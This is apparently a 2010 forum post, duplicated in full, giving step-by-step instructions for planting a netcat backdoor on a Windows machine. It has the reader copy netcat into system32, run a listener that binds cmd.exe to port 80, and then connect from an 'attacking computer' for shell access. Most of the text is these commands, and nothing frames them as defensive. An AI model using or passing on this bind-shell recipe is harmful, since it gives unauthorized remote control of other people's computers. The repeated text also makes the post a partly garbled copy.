08-23-2010, 08:05 PM
Creating a backdoor with nc and connecting to it
First you must download NetCat from the following website:
http://www.downloadnetcat.com
After you download netcat place it to system32.
Now open command line and write this command inside:
nc -v -L -p 80 -e cmd.exe
-v is verbose
-L is to make it to listen
-p is the port you want to listen to.
-e is the program you want to launch when the connection is established
Now on the attacking computer open command line and write this command:
nc -v <IP of the target> 80
Now you have access to the computer.
First you must download NetCat from the following website:
http://www.downloadnetcat.com
After you download netcat place it to system32.
Now open command line and write this command inside:
nc -v -L -p 80 -e cmd.exe
-v is verbose
-L is to make it to listen
-p is the port you want to listen to.
-e is the program you want to launch when the connection is established
Now on the attacking computer open command line and write this command:
nc -v <IP of the target> 80
Now you have access to the computer.